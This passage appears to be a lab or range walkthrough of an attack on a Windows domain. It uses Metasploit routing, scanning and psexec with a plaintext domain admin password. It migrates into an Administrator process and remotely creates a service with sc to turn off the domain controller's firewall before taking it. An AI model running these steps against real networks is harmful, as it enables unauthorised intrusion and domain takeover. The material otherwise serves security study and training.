Ethernet adapter �������� 4:

Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::ec90:4e8e:f29f:ef78%23
IPv4 Address. . . . . . . . . . . : 192.168.93.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
```

Check the domain admins:

```
net group "domain admins" /domain
```

Access denied.

In fact we have already captured the domain admin's credentials: Administrator/Whoami2021

First add an msf route:

```
route add 192.168.93.0 255.255.255.0 3
```

This has to be added from within the meterpreter session.

udp_probe:

```
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0/24
set threads 20
run
```

Found 93.1, 93.20 and 93.30; 93.20 is ourselves.

Try psexec:

```
use exploit/windows/smb/psexec
set smbuser Administrator
set smbpass Whoami2021
set smbdomain whoamianony
set rhosts 192.168.93.1 192.168.93.30
run
```

Strange: 93.1 has no port 445. After a reboot it went back to normal and the IP changed back to .40. psexec against .30 fails, but .40 works:

Probably a firewall issue. We need to turn off the domain controller's firewall from PC1 or PC2, which means switching from SYSTEM to Administrator; PC2 has no usable process to migrate into.

Look at PC1's process list:

```
Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Pr
ocess]
4 0 System x64 0
252 4 smss.exe x64 0 NT AUTHORITY\SYS \SystemRoot\Syste
TEM m32\smss.exe
332 492 svchost.ex x64 0 NT AUTHORITY\LOC C:\Windows\system
e AL SERVICE 32\svchost.exe
336 328 csrss.exe x64 0 NT AUTHORITY\SYS C:\Windows\system
TEM 32\csrss.exe
380 492 OfficeWeb. x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
exe TEM eWeb.exe
388 328 wininit.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\wininit.exe
396 380 csrss.exe x64 1 NT AUTHORITY\SYS C:\Windows\system
TEM 32\csrss.exe
432 380 winlogon.e x64 1 NT AUTHORITY\SYS C:\Windows\system
xe TEM 32\winlogon.exe
492 388 services.e x64 0 NT AUTHORITY\SYS C:\Windows\system
xe TEM 32\services.exe
504 388 lsass.exe x64 0 NT AUTHORITY\SYS C:\Windows\system
TEM 32\lsass.exe
512 388 lsm.exe x64 0 NT AUTHORITY\SYS C:\Windows\system
TEM 32\lsm.exe
612 492 svchost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\svchost.exe
672 492 vmacthlp.e x64 0 NT AUTHORITY\SYS C:\Program Files\
xe TEM VMware\VMware Too
ls\vmacthlp.exe
700 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
720 492 svchost.ex x64 0 NT AUTHORITY\NET C:\Windows\system
e WORK SERVICE 32\svchost.exe
732 700 cmd.exe x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
TEM 64\cmd.exe
784 492 svchost.ex x64 0 NT AUTHORITY\LOC C:\Windows\System
e AL SERVICE 32\svchost.exe
840 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
848 492 svchost.ex x64 0 NT AUTHORITY\SYS C:\Windows\System
e TEM 32\svchost.exe
876 492 svchost.ex x64 0 NT AUTHORITY\NET C:\Windows\system
e WORK SERVICE 32\svchost.exe
884 492 svchost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\svchost.exe
900 1116 OfficeNgin x86 0 NT AUTHORITY\SYS C:\MYOA\nginx\Off
x.exe TEM iceNginx.exe
908 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
916 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
1020 2544 iexplore.e x86 1 WHOAMIANONY\Admi C:\Program Files
xe nistrator (x86)\Internet Ex
plorer\iexplore.e
xe
1036 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
1116 380 OfficeNgin x86 0 NT AUTHORITY\SYS C:\MYOA\nginx\Off
x.exe TEM iceNginx.exe
1160 492 spoolsv.ex x64 0 NT AUTHORITY\SYS C:\Windows\System
e TEM 32\spoolsv.exe
1200 492 svchost.ex x64 0 NT AUTHORITY\LOC C:\Windows\system
e AL SERVICE 32\svchost.exe
1288 492 VGAuthServ x64 0 NT AUTHORITY\SYS C:\Program Files\
ice.exe TEM VMware\VMware Too
ls\VMware VGAuth\
VGAuthService.exe
1348 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1364 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1440 492 OfficeRedi x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
s.exe TEM eRedis.exe
1488 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1492 4504 powershell x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
.exe TEM 64\WindowsPowerSh
ell\v1.0\powershe
ll.exe
1532 396 conhost.ex x64 1 WHOAMIANONY\bunn C:\Windows\system
e y 32\conhost.exe
1540 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
1552 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1560 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1568 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1576 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1608 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1728 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1736 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1744 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1752 1992 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1780 1560 cmd.exe x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
TEM 64\cmd.exe
1808 492 OfficeDbPr x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
oxy.exe TEM eDbProxy.exe
1824 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
1828 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
1992 380 OfficeFPM. x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
exe TEM eFPM.exe
2004 380 OfficeFPM. x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
exe TEM eFPM.exe
2016 492 vmtoolsd.e x64 0 NT AUTHORITY\SYS C:\Program Files\
xe TEM VMware\VMware Too
ls\vmtoolsd.exe
2092 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2192 492 SearchInde x64 0 NT AUTHORITY\SYS C:\Windows\system
xer.exe TEM 32\SearchIndexer.
exe
2208 612 WmiPrvSE.e x64 0 NT AUTHORITY\NET C:\Windows\system
xe WORK SERVICE 32\wbem\wmiprvse.
exe
2368 492 msdtc.exe x64 0 NT AUTHORITY\NET C:\Windows\System
WORK SERVICE 32\msdtc.exe
2436 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2468 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2476 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2484 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2492 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2500 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2508 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2516 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2532 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2540 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2544 3308 iexplore.e x86 1 WHOAMIANONY\Admi C:\Program Files
xe nistrator (x86)\Internet Ex
plorer\iexplore.e
xe
2640 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2656 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2672 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2688 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2704 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
2720 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
2968 492 OfficeTask x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
.exe TEM eTask.exe
2988 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
3040 492 dllhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\dllhost.exe
3204 492 mysqld.exe x64 0 NT AUTHORITY\SYS C:\MYOA\mysql5\bi
TEM n\mysqld.exe
3208 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
3324 492 sppsvc.exe x64 0 NT AUTHORITY\NET C:\Windows\system
WORK SERVICE 32\sppsvc.exe
3368 492 taskhost.e x64 1 WHOAMIANONY\bunn C:\Windows\system
xe y 32\taskhost.exe
3432 1440 redis-serv x64 0 NT AUTHORITY\SYS C:\MYOA\bin\redis
er64.exe TEM -server64.exe
3460 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
3484 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
3496 3768 cmd.exe x64 1 WHOAMIANONY\bunn C:\Windows\system
y 32\cmd.exe
3580 492 svchost.ex x64 0 NT AUTHORITY\SYS C:\Windows\System
e TEM 32\svchost.exe
3744 848 dwm.exe x64 1 WHOAMIANONY\bunn C:\Windows\system
y 32\Dwm.exe
3768 3736 explorer.e x64 1 WHOAMIANONY\bunn C:\Windows\Explor
xe y er.EXE
3840 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
3856 3768 vmtoolsd.e x64 1 WHOAMIANONY\bunn C:\Program Files\
xe y VMware\VMware Too
ls\vmtoolsd.exe
3872 492 svchost.ex x64 0 NT AUTHORITY\NET C:\Windows\system
e WORK SERVICE 32\svchost.exe
3996 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
4048 2004 php-cgi.ex x86 0 NT AUTHORITY\SYS C:\MYOA\bin\php-c
e TEM gi.exe
4164 492 svchost.ex x64 0 NT AUTHORITY\LOC C:\Windows\system
e AL SERVICE 32\svchost.exe
4192 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
4196 492 OfficeIm.e x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
xe TEM eIm.exe
4300 492 OfficeMail x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
.exe TEM eMail.exe
4376 492 OfficeInde x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
x.exe TEM eIndex.exe
4436 492 OfficePOP3 x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
.exe TEM ePop3.exe
4504 1348 cmd.exe x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
TEM 64\cmd.exe
4536 492 OfficeMQ.e x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
xe TEM eMQ.exe
4576 4536 OfficeWork x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
er.exe TEM eWorker.exe
4584 336 conhost.ex x64 0 NT AUTHORITY\SYS C:\Windows\system
e TEM 32\conhost.exe
4616 4748 powershell x64 0 NT AUTHORITY\SYS C:\Windows\system
.exe TEM 32\WindowsPowerSh
ell\v1.0\powershe
ll.exe
4652 492 OfficeDaem x86 0 NT AUTHORITY\SYS C:\MYOA\bin\Offic
on.exe TEM eDaemon.exe
4748 1780 powershell x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
.exe TEM 64\WindowsPowerSh
ell\v1.0\powershe
ll.exe
4900 732 powershell x86 0 NT AUTHORITY\SYS C:\Windows\SysWOW
.exe TEM 64\WindowsPowerSh
ell\v1.0\powershe
ll.exe
```

Process 1020 belongs to Administrator. Stealing its token directly does not let us create processes; we remain SYSTEM.

But we can migrate into the process directly:

```
migrate 1020
```

Here I learned a trick for turning off the firewall with sc:

```
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall
```

Although both commands report failure, the firewall has in fact been turned off.

psexec:

Finally, the domain controller is taken.